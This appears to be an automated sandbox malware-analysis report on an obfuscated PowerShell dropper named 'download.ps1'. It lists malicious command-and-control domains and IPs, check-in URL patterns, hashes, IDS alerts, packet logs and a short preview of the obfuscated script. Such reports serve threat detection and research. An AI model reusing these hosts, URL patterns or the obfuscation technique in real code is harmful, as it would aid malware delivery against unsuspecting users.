                                                                        https://github.com/Pester/Pesterpowershell.exe, 00000000.00000002.1753101388.0000022F2A879000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          		high
                                                                          https://www.youtube.com/?tab=w1powershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://0.google.powershell.exe, 00000000.00000002.1753101388.0000022F2B42E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              https://lh3.googleusercontent.com/ogw/default-user=s96Xpowershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                http://0.google.com/powershell.exe, 00000000.00000002.1753101388.0000022F2B42E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://lh3.googleusercontent.com/ogw/default-user=s24powershell.exe, 00000000.00000002.1784267923.0000022F3A82C000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.google.com/history/optout?hl=enpowershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://www.google.com/wpowershell.exe, 00000000.00000002.1753101388.0000022F2B42E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        https://books.google.com/?hl=en&tab=wppowershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                          		high
                                                                                          https://translate.google.com/?hl=en&tab=wTpowershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                            		high
                                                                                            http://schemas.xmlsoap.org/wsdl/powershell.exe, 00000000.00000002.1753101388.0000022F2A879000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              		high
                                                                                              https://www.google.com/intl/en/about/products?tab=whXpowershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                		high
                                                                                                https://calendar.google.com/calendar?tab=wcpowershell.exe, 00000000.00000002.1753101388.0000022F2BAD0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  		high
                                                                                                  https://aka.ms/pscore68powershell.exe, 00000000.00000002.1753101388.0000022F2A651000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                    		high
                                                                                                    https://lh3.googleusercontent.com/ogw/default-user=s24Xpowershell.exe, 00000000.00000002.1753101388.0000022F2B5A0000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                      		high

                                                                                                      World Map of Contacted IPs

                                                                                                      • No. of IPs < 25%
                                                                                                      • 25% < No. of IPs < 50%
                                                                                                      • 50% < No. of IPs < 75%
                                                                                                      • 75% < No. of IPs

                                                                                                      Public IPs

                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                      45.61.136.138
                                                                                                      		kdemjgebjimkanl.topUnited States
                                                                                                      		40676AS40676UStrue
                                                                                                      142.250.185.132
                                                                                                      		www.google.comUnited States
                                                                                                      		15169GOOGLEUSfalse

                                                                                                      General Information

                                                                                                      Joe Sandbox version:41.0.0 Charoite
                                                                                                      Analysis ID:1582507
                                                                                                      Start date and time:2024-12-30 19:14:06 +01:00
                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                      Overall analysis duration:0h 4m 15s
                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                      Report type:full
                                                                                                      Cookbook file name:default.jbs
                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                      Number of analysed new started processes analysed:7
                                                                                                      Number of new started drivers analysed:0
                                                                                                      Number of existing processes analysed:0
                                                                                                      Number of existing drivers analysed:0
                                                                                                      Number of injected processes analysed:0
                                                                                                      Technologies:
                                                                                                      • HCA enabled
                                                                                                      • EGA enabled
                                                                                                      • AMSI enabled
                                                                                                      Analysis Mode:default
                                                                                                      Analysis stop reason:Timeout
                                                                                                      Sample name:download.ps1
                                                                                                      Detection:MAL
                                                                                                      Classification:mal68.evad.winPS1@2/7@2/2
                                                                                                      EGA Information:Failed
                                                                                                      HCA Information:
                                                                                                      • Successful, ratio: 95%
                                                                                                      • Number of executed functions: 18
                                                                                                      • Number of non-executed functions: 2
                                                                                                      Cookbook Comments:
                                                                                                      • Found application associated with file extension: .ps1

                                                                                                      Warnings

                                                                                                      • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, WmiPrvSE.exe
                                                                                                      • Excluded IPs from analysis (whitelisted): 52.149.20.212, 13.107.246.45
                                                                                                      • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 4280 because it is empty
                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                      • Report size getting too big, too many NtCreateKey calls found.
                                                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                      • VT rate limit hit for: download.ps1

                                                                                                      Simulations

                                                                                                      Behavior and APIs

                                                                                                      TimeTypeDescription
                                                                                                      13:15:00API Interceptor43x Sleep call for process: powershell.exe modified

                                                                                                      Joe Sandbox View / Context

                                                                                                      IPs

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      45.61.136.138download.ps1Get hashmaliciousUnknownBrowse
                                                                                                      • kdemjgebjimkanl.top/4qai6vxy03htr.php?id=computer&key=89124909218&s=527
                                                                                                      download.ps1Get hashmaliciousUnknownBrowse
                                                                                                      • kdemjgebjimkanl.top/du64swbeqthtr.php?id=user-PC&key=115667688416&s=527
                                                                                                      download.ps1Get hashmaliciousUnknownBrowse
                                                                                                      • gajaechkfhfghal.top/he0j3zgk4xhtr.php?id=computer&key=74358253620&s=527
                                                                                                      download.ps1Get hashmaliciousUnknownBrowse
                                                                                                      • gajaechkfhfghal.top/u642xz31jvhtr.php?id=user-PC&key=84925345116&s=527
                                                                                                      download.ps1Get hashmaliciousUnknownBrowse
                                                                                                      • gajaechkfhfghal.top/fw59ib1u2yhtr.php?id=computer&key=64956393081&s=527
                                                                                                      download.ps1Get hashmaliciousUnknownBrowse
                                                                                                      • gajaechkfhfghal.top/yfshl0dga3htr.php?id=user-PC&key=122775442322&s=527
                                                                                                      download.ps1Get hashmaliciousUnknownBrowse
                                                                                                      • gajaechkfhfghal.top/6v28jh9yqnhtr.php?id=computer&key=74624839462&s=527
                                                                                                      download.ps1Get hashmaliciousUnknownBrowse
                                                                                                      • gajaechkfhfghal.top/s7rtm36opvhtr.php?id=computer&key=10840995318&s=527
                                                                                                      download.ps1Get hashmaliciousUnknownBrowse
                                                                                                      • gajaechkfhfghal.top/26te7apny8htr.php?id=user-PC&key=60099241868&s=527
                                                                                                      download.ps1Get hashmaliciousUnknownBrowse
                                                                                                      • gajaechkfhfghal.top/fm2yw8l13shtr.php?id=user-PC&key=91595968094&s=527

                                                                                                      Domains

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      kdemjgebjimkanl.topdownload.ps1Get hashmaliciousUnknownBrowse
                                                                                                      • 45.61.136.138
                                                                                                      download.ps1Get hashmaliciousUnknownBrowse
                                                                                                      • 45.61.136.138

                                                                                                      ASNs

                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                      AS40676USdownload.ps1Get hashmaliciousUnknownBrowse
                                                                                                      • 45.61.136.138
                                                                                                      download.ps1Get hashmaliciousUnknownBrowse
                                                                                                      • 45.61.136.138
                                                                                                      loligang.arm.elfGet hashmaliciousMiraiBrowse
                                                                                                      • 107.176.168.227
                                                                                                      download.ps1Get hashmaliciousUnknownBrowse
                                                                                                      • 45.61.136.138
                                                                                                      download.ps1Get hashmaliciousUnknownBrowse
                                                                                                      • 45.61.136.138
                                                                                                      download.ps1Get hashmaliciousUnknownBrowse
                                                                                                      • 45.61.136.138
                                                                                                      download.ps1Get hashmaliciousUnknownBrowse
                                                                                                      • 45.61.136.138
                                                                                                      download.ps1Get hashmaliciousUnknownBrowse
                                                                                                      • 45.61.136.138
                                                                                                      download.ps1Get hashmaliciousUnknownBrowse
                                                                                                      • 45.61.136.138
                                                                                                      download.ps1Get hashmaliciousUnknownBrowse
                                                                                                      • 45.61.136.138

                                                                                                      JA3 Fingerprints

                                                                                                      No context

                                                                                                      Dropped Files

                                                                                                      No context

                                                                                                      Created / dropped Files

                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):64
                                                                                                      Entropy (8bit):1.1510207563435464
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:NlllulRjFllp:NllU
                                                                                                      MD5:7B390667B7AD392C3A7ECD95310E0D68
                                                                                                      SHA1:F7ED92E360DACA5B2BB3152AFB8A26DD5A408706
                                                                                                      SHA-256:E233F71BD3E7F3B34DC94F8F9DDB533F59E07BE7AEFA021541DF0160436E1C0D
                                                                                                      SHA-512:0131C5BD611E47AF843A354F9AD83CAE0AA4A64B0FB723BB485B9FBDBF409A98BB5248336BCDE84FF72E3EB44D2EC10C30133767CD0DE32C77757C0EE75DCCC2
                                                                                                      Malicious:false
                                                                                                      Reputation:moderate, very likely benign file
                                                                                                      Preview:@...e.................................@. ............@..........

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3epk4xzs.ejw.ps1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Reputation:high, very likely benign file
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hmgepzti.rln.psm1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Reputation:high, very likely benign file
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mgt1qoaj.nxt.psm1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uzo3vy2q.3cb.ps1

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):60
                                                                                                      Entropy (8bit):4.038920595031593
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                      MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                      SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                      SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                      SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                      Malicious:false
                                                                                                      Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms (copy)

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):6221
                                                                                                      Entropy (8bit):3.737844929496551
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:1avs33CxH02kvhkvCCtE0B1fFH/0B1fgHD:1akyUi3BIBc
                                                                                                      MD5:200917FECBAD7C5DB3D394EF2247AC61
                                                                                                      SHA1:6E5398BB25D7447B62EFAD48DC53308E889F8A4B
                                                                                                      SHA-256:76AA1CE4E3407EAF1A1C1073B1E8C82C18369912552768903FDC0E4FFC2AC6E6
                                                                                                      SHA-512:86BAF3D5AF8A9060AF405DCC405B50B45A6586C8DB7D477BE948D176732364C7E6466D133F7B7DA1A9EAFF94E1E078BDE2C9DB44069382DE9E6C57636CC42BC2
                                                                                                      Malicious:false
                                                                                                      Preview:...................................FL..................F.".. ...-/.v.....f...Z..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....l3...Z..ZR...Z......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y............................%..A.p.p.D.a.t.a...B.V.1......Y...Roaming.@......CW.^.Y...............................R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^DW.`..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.Y.....Q...........

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\6X544N1UAG4UI7SPZGRE.temp

                                                                                                      Download File
                                                                                                      Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):6221
                                                                                                      Entropy (8bit):3.737844929496551
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:1avs33CxH02kvhkvCCtE0B1fFH/0B1fgHD:1akyUi3BIBc
                                                                                                      MD5:200917FECBAD7C5DB3D394EF2247AC61
                                                                                                      SHA1:6E5398BB25D7447B62EFAD48DC53308E889F8A4B
                                                                                                      SHA-256:76AA1CE4E3407EAF1A1C1073B1E8C82C18369912552768903FDC0E4FFC2AC6E6
                                                                                                      SHA-512:86BAF3D5AF8A9060AF405DCC405B50B45A6586C8DB7D477BE948D176732364C7E6466D133F7B7DA1A9EAFF94E1E078BDE2C9DB44069382DE9E6C57636CC42BC2
                                                                                                      Malicious:false
                                                                                                      Preview:...................................FL..................F.".. ...-/.v.....f...Z..z.:{.............................:..DG..Yr?.D..U..k0.&...&......vk.v....l3...Z..ZR...Z......t...CFSF..1.....CW.^..AppData...t.Y^...H.g.3..(.....gVA.G..k...@......CW.^.Y............................%..A.p.p.D.a.t.a...B.V.1......Y...Roaming.@......CW.^.Y...............................R.o.a.m.i.n.g.....\.1.....DW.N..MICROS~1..D......CW.^DW.`..........................9D..M.i.c.r.o.s.o.f.t.....V.1.....DWQ`..Windows.@......CW.^DWQ`..............................W.i.n.d.o.w.s.......1.....CW.^..STARTM~1..n......CW.^DW.`....................D.....=X..S.t.a.r.t. .M.e.n.u...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.6.......1.....DW.N..Programs..j......CW.^DW.`....................@.........P.r.o.g.r.a.m.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.2.....n.1......O.K..WINDOW~1..V......CW.^DW.`..........................d...W.i.n.d.o.w.s. .P.o.w.e.r.S.h.e.l.l.....z.2......O.I .WINDOW~1.LNK..^......CW.^.Y.....Q...........

                                                                                                      Static File Info

                                                                                                      General

                                                                                                      File type:ASCII text, with very long lines (10831), with CRLF line terminators
                                                                                                      Entropy (8bit):5.967110225025242
                                                                                                      TrID:
                                                                                                        File name:download.ps1
                                                                                                        File size:20'393 bytes
                                                                                                        MD5:237f43b9f810e6c6a16c22f7b13d3432
                                                                                                        SHA1:819211cf07c4070f99e7cad5905a1e3f4865628e
                                                                                                        SHA256:f0b02355a54d79467e35c12fe9b31d8f69f0bca52aef5fcf684d9b160ba561f0
                                                                                                        SHA512:0cb243cffd7076ce72e540d87b223d1e99f212cd277c82b936b772952759d954645d772dfea35d510170c4ae10b084628f4ed6be71afa981a376bee5a1ed47e0
                                                                                                        SSDEEP:384:Rzz93+7Mrc65BhyKQLCWl4nFcZJHyJojMnj25ZGHy61hKXRKobnlNh8FTXRpzft2:v3vo6Vy46SSHyK5ZzGh4RKorlNqFThP2
                                                                                                        TLSH:92926CA7738CDDF282D996AF5213EC043BA9A42FC5ABAEC4FB4982C133916015E4DC50
                                                                                                        File Content Preview:$vizlamghu=$executioncontext;$inonisesisalreesortionreisisinbeis = (-joIN (@((-7838+7891),(-6906+(-2195+(17502-(1174+(-415+(8235150/1085)))))),(245955/(-3778+8093)),(9419-(16751772/1788)),(428232/7647),(7520-(14488-7022)),(-7741+(16002-8205)),(-8968+9023)

                                                                                                        File Icon

                                                                                                        Icon Hash:3270d6baae77db44

                                                                                                        Network Behavior

                                                                                                        Suricata IDS Alerts

                                                                                                        TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                        2024-12-30T19:15:04.888420+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity1192.168.2.44973045.61.136.13880TCP
                                                                                                        2024-12-30T19:15:04.888420+01002057741ET MALWARE TA582 CnC Checkin1192.168.2.44973045.61.136.13880TCP
                                                                                                        2024-12-30T19:15:05.867335+01001810000Joe Security ANOMALY Windows PowerShell HTTP activity1192.168.2.449731142.250.185.13280TCP

                                                                                                        Network Port Distribution

                                                                                                        TCP Packets

                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                        Dec 30, 2024 19:15:04.230721951 CET4973080192.168.2.445.61.136.138
                                                                                                        Dec 30, 2024 19:15:04.235532999 CET804973045.61.136.138192.168.2.4
                                                                                                        Dec 30, 2024 19:15:04.235605001 CET4973080192.168.2.445.61.136.138
                                                                                                        Dec 30, 2024 19:15:04.239268064 CET4973080192.168.2.445.61.136.138
                                                                                                        Dec 30, 2024 19:15:04.244060040 CET804973045.61.136.138192.168.2.4
                                                                                                        Dec 30, 2024 19:15:04.841994047 CET804973045.61.136.138192.168.2.4
                                                                                                        Dec 30, 2024 19:15:04.852571011 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:04.857378006 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:04.857588053 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:04.857588053 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:04.862401962 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:04.888420105 CET4973080192.168.2.445.61.136.138
                                                                                                        Dec 30, 2024 19:15:05.867115021 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:05.867273092 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:05.867285967 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:05.867297888 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:05.867309093 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:05.867321968 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:05.867328882 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:05.867336035 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:05.867335081 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:05.867350101 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:05.867362976 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:05.867396116 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:05.867436886 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:05.872227907 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:05.872253895 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:05.872297049 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:05.955179930 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:05.955193043 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:05.955204010 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:05.955310106 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:05.959022045 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:05.959033012 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:05.959044933 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:05.959161997 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:05.959162951 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:05.971822023 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:05.971832037 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:05.971988916 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:05.971992016 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:05.972003937 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:05.972037077 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:05.984819889 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:05.984833002 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:05.984843969 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:05.984904051 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:05.992614985 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:05.992626905 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:05.992640972 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:05.992676973 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:05.992712021 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:06.000130892 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.000149965 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.000214100 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:06.000261068 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.000281096 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.000318050 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:06.008028030 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.008039951 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.008049965 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.008085012 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:06.015646935 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.015656948 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.015727997 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:06.015749931 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.015789032 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.015794992 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:06.023520947 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.023533106 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.023570061 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:06.023619890 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.023629904 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.023680925 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:06.031173944 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.031205893 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.031220913 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:06.031260014 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.031270981 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.031297922 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:06.043701887 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.043714046 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.043751001 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.043813944 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.043817043 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:06.043962002 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:06.046658039 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.046677113 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.046727896 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:06.046833038 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.046875000 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:06.046890974 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.054425955 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.054440975 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.054507971 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.054514885 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:06.054517984 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.054568052 CET4973180192.168.2.4142.250.185.132
                                                                                                        Dec 30, 2024 19:15:06.062181950 CET8049731142.250.185.132192.168.2.4
                                                                                                        Dec 30, 2024 19:15:06.062205076 CET8049731142.250.185.132192.168.2.4
